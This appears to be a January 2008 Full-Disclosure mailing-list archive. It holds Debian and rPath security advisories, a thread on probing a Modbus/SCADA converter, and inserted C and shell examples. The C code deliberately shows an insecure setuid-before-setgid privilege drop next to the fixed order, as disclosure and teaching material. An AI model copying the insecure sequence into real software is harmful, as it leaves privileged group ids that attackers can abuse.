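    if (setuid(uid) != 0)
        return -1;
    if (setgid(gid) != 0)          /* EPERM here once uid is not root */
        return -1;
    return verify_ids(uid, gid);
}

/*
 * Correct order: supplementary groups, then gid, then uid, every return
 * value checked, followed by a post-condition check so a partial drop
 * cannot go unnoticed.
 */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* setgroups() needs CAP_SETGID; only a root caller is expected to have it. */
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    /* Regaining root must now be impossible (no saved uid 0 left behind). */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return verify_ids(uid, gid);
}

/* Run fn(uid, gid) in a child so both orders can be tried from one process. */
static int run_in_child(int (*fn)(uid_t, gid_t), uid_t uid, gid_t gid)
{
    pid_t pid = fork();
    int status = 0;

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(fn(uid, gid) == 0 ? 0 : 1);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

int main(void)
{
    /* Constructed unprivileged target; 65534 is nobody/nogroup on Debian. */
    uid_t uid = 65534;
    gid_t gid = 65534;

    if (geteuid() != 0) {
        printf("not root: dropping to own ids only -> %s\n",
               drop_privileges(getuid(), getgid()) == 0 ? "ok" : "failed");
        return 0;
    }
    printf("setuid then setgid (the CVE-2007-5191 order): %s\n",
           run_in_child(drop_privileges_wrong_order, uid, gid) == 0
               ? "ok" : "FAILED, gid still privileged");
    printf("setgroups, setgid, setuid (correct order): %s\n",
           run_in_child(drop_privileges, uid, gid) == 0 ? "ok" : "FAILED");
    return 0;
}
```

Run it as root on a test box to see the first sequence fail and the second succeed; as an ordinary user it only verifies the checked sequence against the caller's own ids.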
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHf512wM/Gs81MDZ0RAnxhAKCknVGuqTfaC3nirZuVA88LlJ19gQCgtBCH
GD8mJVKbnub7fmdBURXoiQQ=
=AZ6q
-----END PGP SIGNATURE-----

From skx at debian.org Sat Jan 5 15:11:22 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 15:11:22 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1448-1] New eggdrop packages fix execution of arbitrary code
Message-ID: <20080105151122.GA21677@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-1448-1                security at debian.org
http://www.debian.org/security/                             Steve Kemp
January 05, 2008                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : eggdrop
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2807
Debian Bug     : 427157

It was discovered that eggdrop, an advanced IRC robot, was vulnerable to a buffer overflow which could result in a remote user executing arbitrary code.

For the stable distribution (etch), this problem has been fixed in version 1.6.18-1etch1.

For the old stable distribution (sarge), this problem has been fixed in version 1.6.17-3sarge1.

For the unstable distribution (sid), this problem has been fixed in version 1.6.18-1.1.

We recommend that you upgrade your eggdrop package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives, architecture independent packages (eggdrop-data) and per-architecture eggdrop packages, with Size/MD5 checksums (list omitted).

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives, architecture independent packages (eggdrop-data) and per-architecture eggdrop packages, with Size/MD5 checksums (list omitted).

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From skx at debian.org Sat Jan 5 14:52:44 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 14:52:44 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1448-1] New eggdrop packages fix arbitrary code execution
Message-ID: <20080105145244.GA13445@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1448-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 05, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : eggdrop
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2807
Debian Bug     : 427157

It was discovered that eggdrop, an advanced IRC robot, was vulnerable to
a buffer overflow which could result in a remote user executing arbitrary
code.

For the stable distribution (etch), this problem has been fixed in
version 1.6.18-1etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 1.6.17-3sarge1.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.18-1.1

We recommend that you upgrade your eggdrop package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

[Download URLs and Size/MD5 checksums for the eggdrop 1.6.17-3sarge1
source archives (.diff.gz, .orig.tar.gz, .dsc), the architecture
independent eggdrop-data package and the eggdrop binary packages for
alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390
and sparc]

Debian GNU/Linux 4.0 alias etch
- -------------------------------

[Download URLs and Size/MD5 checksums for the eggdrop 1.6.18-1etch1
source archives (.orig.tar.gz, .dsc, .diff.gz), the architecture
independent eggdrop-data package and the eggdrop binary packages for
alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and
sparc]

These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From gmaggro at rogers.com Sat Jan 5 19:01:23 2008
From: gmaggro at rogers.com (gmaggro)
Date: Sat, 05 Jan 2008 14:01:23 -0500
Subject: [Full-disclosure] scada/plc gear
Message-ID: <477FD403.4060605@rogers.com>

OK, having done some digging, a decent little chunk of industrial
automation gear has started coming my way; 1 of 6 pieces. All totaled,
roughly under $1000. Small standalone stuff for now; the shipping on
populated PLC chassis like SLC-500 stuff is problematic.

If people have specific technical questions, want a script run against
a piece of gear or a custom protocol capture done, I will entertain such
requests. I am also willing to open the cases and pick up the soldering
iron, attempt rom/firmware dumps, etc. Are there any particular tests or
tools someone would like me to work into my routine right from the
start?

Hardware piece #1 is a Kohler Power Systems modbus/ethernet converter,
pn# GM40165. So far, nmap (4.52) has been detecting the modbus running
on port 502/tcp as asa-appl-proto. There is not a great deal of
information out there about this protocol. The email contact associated
with the port in some /etc/services files (ddube at modicon.com) is
disabled, and the domain redirects to an industrial automation company
(telemecanique.com). Running/OS details indicate Enerdis or Lantronix
embedded. MAC prefix is 00:20:4A (Pronet Gmbh).
I suppose I could have just posted the nmap output, but figured that
might annoy people unduly.

Perhaps it would be worth renaming 'asa-appl-proto' on 502 to 'modbus'
or something related? Just a suggestion to make it clearer for some
people. In any case, this is mitigated by scanning with the -C option,
which grabs info from 80 and 161, clearly identifying it as being a
modbus related device, the sysDescr stating "Modbus/TCP to RTU Bridge".
And oh yeah, it has a wide open text configuration interface on 9999.

Handy/Interesting modbus tcp/udp links:

http://jamod.sourceforge.net/development/tcp_master_howto.html
http://jamod.sourceforge.net/kbase/protocol.html

From announce-noreply at rpath.com Sat Jan 5 01:12:13 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 04 Jan 2008 20:12:13 -0500
Subject: [Full-disclosure] rPSA-2008-0006-1 libexif
Message-ID: <477ed96d.JrvHoxWrGvDDVYH1%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0006-1
Published: 2008-01-04
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    libexif=conary.rpath.com at rpl:1/0.6.16-0.2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2068

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6351
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6352

Description:
    Previous versions of the libexif package contain multiple
    vulnerabilities, the most serious of which allows user-assisted
    attackers to execute arbitrary code using images with maliciously
    crafted EXIF tags.

    http://wiki.rpath.com/Advisories:rPSA-2008-0006

    Copyright 2008 rPath, Inc.
    This file is distributed under the terms of the MIT License.
    A copy is available at http://www.rpath.com/permanent/mit-license.html

From announce-noreply at rpath.com Sat Jan 5 01:13:02 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 04 Jan 2008 20:13:02 -0500
Subject: [Full-disclosure] rPSA-2008-0007-1 tetex tetex-afm tetex-dvips tetex-fonts tetex-latex tetex-xdvi
Message-ID: <477ed99e.98bJCpB2WV3QOPnF%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0007-1
Published: 2008-01-04
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    tetex=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-afm=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-dvips=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-fonts=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-latex=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-xdvi=conary.rpath.com at rpl:1/2.0.2-28.10-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1972

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4033

Description:
    Previous versions of the tetex package are vulnerable to an
    Arbitrary Code Execution attack in which user-assisted attackers can
    use malformed font data to cause a buffer overflow in applications
    that use t1lib.

    http://wiki.rpath.com/Advisories:rPSA-2008-0007

    Copyright 2008 rPath, Inc.
    This file is distributed under the terms of the MIT License.
    A copy is available at http://www.rpath.com/permanent/mit-license.html

From announce-noreply at rpath.com Sat Jan 5 15:11:53 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Sat, 05 Jan 2008 10:11:53 -0500
Subject: [Full-disclosure] rPSA-2008-0008-1 cups
Message-ID: <477f9e39.fGK8LtF8AyYDvYH5%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0008-1
Published: 2008-01-05
Products: rPath Linux 1
Rating: Informational
Exposure Level Classification:
    Local Weakness
Updated Versions:
    cups=conary.rpath.com at rpl:1/1.1.23-14.5-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2009

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5848

Description:
    Previous versions of the cups package contain a buffer-overflow
    weakness. It is not believed that this weakness can be exploited to
    execute malicious code.

    http://wiki.rpath.com/Advisories:rPSA-2008-0008

    Copyright 2008 rPath, Inc.
    This file is distributed under the terms of the MIT License.
    A copy is available at http://www.rpath.com/permanent/mit-license.html

From oshadi at lfod.info Fri Jan 4 23:02:47 2008
From: oshadi at lfod.info (Ishan Oshadi Jayawardene)
Date: Sat, 05 Jan 2008 00:02:47 +0100
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <452214.1315441199301228241.JavaMail.servlet@perfora>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
Message-ID: <477EBB17.90607@lfod.info>

Once a so-called security expert was pen-testing my VMS shop. We were
having a nice chat while his eval version of GFI LANguard finished the
scan, and got to talk about VMS. He didn't believe in the robust
security of VMS and told me to do a search for vms on bugtraq, and see
how many results came up. So I did, and was horrified when I saw
thousands of results... Until I noticed that the matched string in all
the (barring perhaps 1 in 10000) results was "VMs"; not "VMS" or "vms".
(This was some years ago.
The bugtraq search function's improved now.)

Randal T. Rioux wrote:
>> Valdis.Kletnieks at vt.edu said:
>
>> Bonus points for knowing that VMS was mostly written in Bliss/32 or some
>> such, and VM and MVS were a mixture of assembler and (later on) PL/S.
>> No C knowledge needed for those critters...
>
> OpenVMS is less than 40% Blissful... though I'm not familiar with the
> original source (wasn't it written on stone tablets?). About 50% is C,
> with a healthy mix of obsoletes making the difference. How something so
> elegant could be spawned from such chaos is beyond me.
>
> Mostly, the VMS basic OS utilities are Bliss-based (think: GNU).
>
> I really wish HP would open OpenVMS before they kill it.
>
> Security relevance: UNHACKABLE!
>
> Randy
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From jmm at debian.org Sun Jan 6 18:04:18 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 6 Jan 2008 19:04:18 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1451-1] New mysql-dfsg-5.0 packages fix several vulnerabilities
Message-ID: <20080106180418.GA6187@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1451-1                  security at debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
January 06, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mysql-dfsg-5.0
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3781 CVE-2007-5969 CVE-2007-6304

Several local/remote vulnerabilities have been discovered in the MySQL
database server.
The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2007-3781

    It was discovered that privilege validation for the source table of
    CREATE TABLE LIKE statements was insufficiently enforced, which might
    lead to information disclosure. This is only exploitable by
    authenticated users.

CVE-2007-5969

    It was discovered that symbolic links were handled insecurely during
    the creation of tables with DATA DIRECTORY or INDEX DIRECTORY
    statements, which might lead to denial of service by overwriting
    data. This is only exploitable by authenticated users.

CVE-2007-6304

    It was discovered that queries to data in a FEDERATED table can lead
    to a crash of the local database server, if the remote server returns
    information with fewer columns than expected, resulting in denial of
    service.

For the unstable distribution (sid), these problems have been fixed in
version 5.0.51-1.

For the stable distribution (etch), these problems have been fixed in
version 5.0.32-7etch4.

The old stable distribution (sarge) doesn't contain mysql-dfsg-5.0.

We recommend that you upgrade your mysql-dfsg-5.0 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64,
mips, mipsel, powerpc, s390 and sparc.
[Download URLs and Size/MD5 checksums for the mysql-dfsg-5.0
5.0.32-7etch4 source archives (.dsc, .diff.gz, .orig.tar.gz), the
architecture independent mysql-client, mysql-server and mysql-common
packages, and the libmysqlclient15-dev, libmysqlclient15off,
mysql-server-4.1, mysql-client-5.0 and mysql-server-5.0 binary packages
for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and
sparc]

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From skx at debian.org Sun Jan 6 20:29:28 2008
From: skx at debian.org (Steve Kemp)
Date: Sun, 6 Jan 2008 20:29:28 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1452-1] New wzdftpd packages fix denial of service
Message-ID: <20080106202928.GA7776@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1452-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 06, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wzdftpd
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-5300
Debian Bug     : 446192

"k1tk4t" discovered that wzdftpd, a portable, modular, small and efficient
ftp server, did not correctly handle the receipt of long usernames. This could allow remote users to cause the daemon to exit. For the stable distribution (etch), this problem has been fixed in version 0.8.1-2etch1. For the old stable distribution (sarge), this problem has been fixed in version 0.5.2-1.1sarge3. For the unstable distribution (sid), this problem has been fixed in version 0.8.2-2.1. We recommend that you upgrade your wzdftpd package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - --------------------------------- Source archives: http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2.orig.tar.gz Size/MD5 checksum: 818860 62a4af39801fe581f85cd063c5fc4717 http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3.dsc Size/MD5 checksum: 769 56ce84eafc6683eae084c1edbe5a4567 http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3.diff.gz Size/MD5 checksum: 8531 80784497bc6ccee3adc676584fe1df75 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_alpha.deb Size/MD5 checksum: 294374 3b7e0d4266cdc03f93c1b3734f606287 http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_alpha.deb Size/MD5 checksum: 49304 c1c1978ecd2b95b805e207e3a245682f http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_alpha.deb Size/MD5 checksum: 30788 dd38408c8485348f8bc8164958a04860 http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_alpha.deb Size/MD5 checksum: 312336 
Debian GNU/Linux 4.0 alias etch
- -------------------------------

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From b9u4ea at gmail.com Mon Jan 7 17:37:30 2008
From: b9u4ea at gmail.com (b9u4ea)
Date: Mon, 7 Jan 2008 11:37:30 -0600
Subject: [Full-disclosure] scada/plc gear
In-Reply-To: <477FD403.4060605@rogers.com>
References: <477FD403.4060605@rogers.com>
Message-ID: <35a0b7430801070937v5d8f147yb4cad715467d7573@mail.gmail.com>

There's a ton of information on the Internet for Schneider/Modicon's modbus
protocol, including modbus+, modbusrtu, and modbustcp... Specs are freely
available: http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b.pdf.
If you spend 2 minutes with google you'll find more than you'll need. For
example: http://www.modbus.pl/download/zxy66/v19/modbus_perl_client.zip.

Anyways, enjoy your research...

On Jan 5, 2008 1:01 PM, gmaggro wrote:
> OK, having done some digging a decent little chunk of industrial
> automation gear has started coming my way; 1 of 6 pieces. All totaled,
> roughly under $1000. Small standalone stuff for now; the shipping on
> populated PLC chassis like SLC-500 stuff is problematic.
>
> If people have specific technical questions, want a script run against a
> piece of gear or a custom protocol capture done I will entertain such
> requests. I am also willing to open the cases and pick up the soldering
> iron, attempt rom/firmware dumps, etc.
>
> Are there any particular tests or tools someone would like me to work
> into my routine right from the start?
>
> Hardware piece #1 is a Kohler Power Systems modbus/ethernet converter,
> pn# GM40165.
>
> So far, nmap (4.52) has been detecting the modbus running on port
> 502/tcp as asa-appl-proto. There is not a great deal of information out
> there about this protocol. The email contact associated with the port in
> some /etc/services files (ddube at modicon.com) is disabled, and the domain
> redirects to an industrial automation company (telemecanique.com).
> Running/OS details indicate Enerdis or Lantronix embedded. MAC prefix is
> 00:20:4A (Pronet Gmbh). I suppose I could have just posted the nmap
> output, but figured that might annoy people unduly.
>
> Perhaps it would be worth renaming 'asa-appl-proto' on 502 to 'modbus'
> or something related? Just a suggestion to make it clearer for some
> people. In any case, this is mitigated by scanning with the -C option
> which grabs info from 80 and 161 clearly identifying it as being a
> modbus related device, the sysDescr stating "Modbus/TCP to RTU Bridge".
> And oh yeah, it has a wide open text configuration interface on 9999.
>
> Handy/Interesting modbus tcp/udp links:
>
> http://jamod.sourceforge.net/development/tcp_master_howto.html
> http://jamod.sourceforge.net/kbase/protocol.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From jmm at debian.org Mon Jan 7 18:41:20 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Mon, 7 Jan 2008 19:41:20 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1453-1] New tomcat5 packages fix several vulnerabilities
Message-ID: <20080107184120.GA3406@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1453-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 07, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tomcat5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3382 CVE-2007-3385 CVE-2007-5461

Several remote vulnerabilities have been discovered in the Tomcat servlet
and JSP engine. The Common Vulnerabilities and Exposures project identifies
the following problems:

CVE-2007-3382

    It was discovered that single quotes (') in cookies were treated as
    a delimiter, which could lead to an information leak.

CVE-2007-3385

    It was discovered that the character sequence \" in cookies was
    handled incorrectly, which could lead to an information leak.

CVE-2007-5461

    It was discovered that the WebDAV servlet is vulnerable to absolute
    path traversal.

For the stable distribution (etch), these problems have been fixed in
version 5.0.30-12etch1.

The old stable distribution (sarge) doesn't contain tomcat5.

The unstable distribution (sid) no longer contains tomcat5.

We recommend that you upgrade your tomcat5 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips,
mipsel, powerpc, s390 and sparc.

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From jmm at debian.org Mon Jan 7 19:48:32 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Mon, 7 Jan 2008 20:48:32 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1454-1] New freetype packages fix arbitrary code execution
Message-ID: <20080107194832.GA7048@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1454-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 07, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : freetype
Vulnerability  : integer overflow
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2007-1351

Greg MacManus discovered an integer overflow in the font handling of
libfreetype, a FreeType 2 font engine, which might lead to denial of
service or possibly the execution of arbitrary code if a user is tricked
into opening a malformed font.

For the unstable distribution (sid), this problem has been fixed in
version 2.3.5-1.

For the stable distribution (etch), this problem has been fixed in
version 2.2.1-5+etch2.

For the old stable distribution (sarge) this problem will be fixed soon.

We recommend that you upgrade your freetype packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips,
mipsel, powerpc, s390 and sparc.
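The advisory pairs every package URL with a "Size/MD5 checksum: SIZE MD5" entry; the step the manual wget/dpkg -i path leaves implicit is checking the downloaded file against that entry before installing it. The shell function below is an added example, not part of the Debian advisory: it takes the checksum line exactly as printed in a DSA and refuses the file on a size or digest mismatch (the function names and the md5sum/openssl fallback are my own choices).

```shell
#!/bin/sh
# Added example (not from the advisory): verify a downloaded .deb against the
# "Size/MD5 checksum: <size> <md5>" line a DSA prints for it, before dpkg -i.

# MD5 of a file: md5sum where coreutils is present, openssl otherwise.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        openssl dgst -md5 "$1" | sed 's/.*= //'
    fi
}

# verify_deb FILE "Size/MD5 checksum: SIZE MD5"
# Returns 0 only when both the byte count and the MD5 match the advisory line.
verify_deb() {
    file=$1
    line=$2
    # Extract SIZE and MD5 from the advisory line; anything else is malformed.
    set -- $(printf '%s\n' "$line" \
        | sed -n 's/^Size\/MD5 checksum: *\([0-9][0-9]*\) *\([0-9A-Fa-f]\{32\}\) *$/\1 \2/p')
    [ $# -eq 2 ] || { echo "malformed checksum line: $line" >&2; return 1; }
    want_size=$1
    want_md5=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -f "$file" ] || { echo "$file: no such file" >&2; return 1; }
    have_size=$(wc -c < "$file" | tr -d ' ')
    have_md5=$(file_md5 "$file")
    if [ "$have_size" != "$want_size" ]; then
        echo "$file: size $have_size, advisory lists $want_size" >&2
        return 1
    fi
    if [ "$have_md5" != "$want_md5" ]; then
        echo "$file: md5 $have_md5, advisory lists $want_md5" >&2
        return 1
    fi
    echo "$file: size and MD5 match the advisory"
}

# Typical use after "wget url": copy the matching line from the DSA.
# verify_deb libfreetype6_2.2.1-5+etch2_i386.deb \
#     "Size/MD5 checksum: 341816 cbe96a1f686ac5abcd657976bc9c6388" && dpkg -i libfreetype6_2.2.1-5+etch2_i386.deb
```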
